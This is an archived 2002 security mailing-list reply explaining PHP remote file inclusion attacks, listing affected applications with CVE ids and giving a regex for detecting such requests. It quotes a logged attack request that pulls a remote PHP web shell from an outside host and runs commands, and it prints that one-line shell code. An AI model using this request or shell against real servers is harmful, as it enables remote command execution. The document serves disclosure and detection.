OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Steven M. Christey (coley_at_linus.mitre.org)
Date: Wed Sep 18 2002 - 21:49:26 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    zeno <bugtraqcgisecurity.net> said:

    >I figured a few people may find this interesting.
    >
    >
    >200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"
    >
    >contents of www.jtecx.hpg.com.br/jtec.txt
    >
    >------------------- start snip
    >
    ><?php
    >system($cmd);
    >?>
    >
    >------------------- end snip

    A number of PHP scripts have demonstrated this type of vulnerability,
    which was documented in "A Study In Scarlet - Exploiting Common
    Vulnerabilities in PHP Applications" by Shaun Clowes; see
    http://www.securereality.com.au/studyinscarlet.txt
    (http://www.zend.com/zend/art/art-oertli.php also looks useful). This
    has been a topic of discussion on the webappsec list.

    Basically, PHP can allow the programmer to access files from remote
    sites. PHP scripts that don't properly filter arguments to an
    "include" command can have a remote URL injected by the attacker. PHP
    also allows you to define variables as a parameter (field) into the
    script. The combination of these factors makes it easy for an
    attacker to execute code in the vulnerable application. Note: this
    may be dependent on configuration and/or the PHP version.

    Some vulnerable applications are:

      BUGTRAQ:20001125 Security problems with TWIG webmail system
      URL:http://marc.theaimsgroup.com/?l=bugtraq&m=97535137010910&w=2
      (CVE: CVE-2000-1166)

      BUGTRAQ:20020116 PHP-Nuke allows Command Execution & Much more
      URL:http://marc.theaimsgroup.com/?l=bugtraq&m=101121913914205&w=2
      (CVE: CAN-2002-0206)

      [this could be the vulnerability being exploited in zeno's example]

      BUGTRAQ:20020506 b2 php remote command execution
      URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102069726727513&w=2
      (CVE: CAN-2002-0734)

      BUGTRAQ:20020517 Phorum 3.3.2a remote command execution
      URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102167071314746&w=2
      (CVE: CAN-2002-0764)

    A generic Perl regular expression to catch some of these exploits is:

      /\.php[2-9]?\?.*=http:\/\//

    This seems to do a good job, although it could generate some false
    positives for valid PHP scripts that pass URLs as arguments, e.g. for
    redirecting the user out of the site.

    - Steve

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com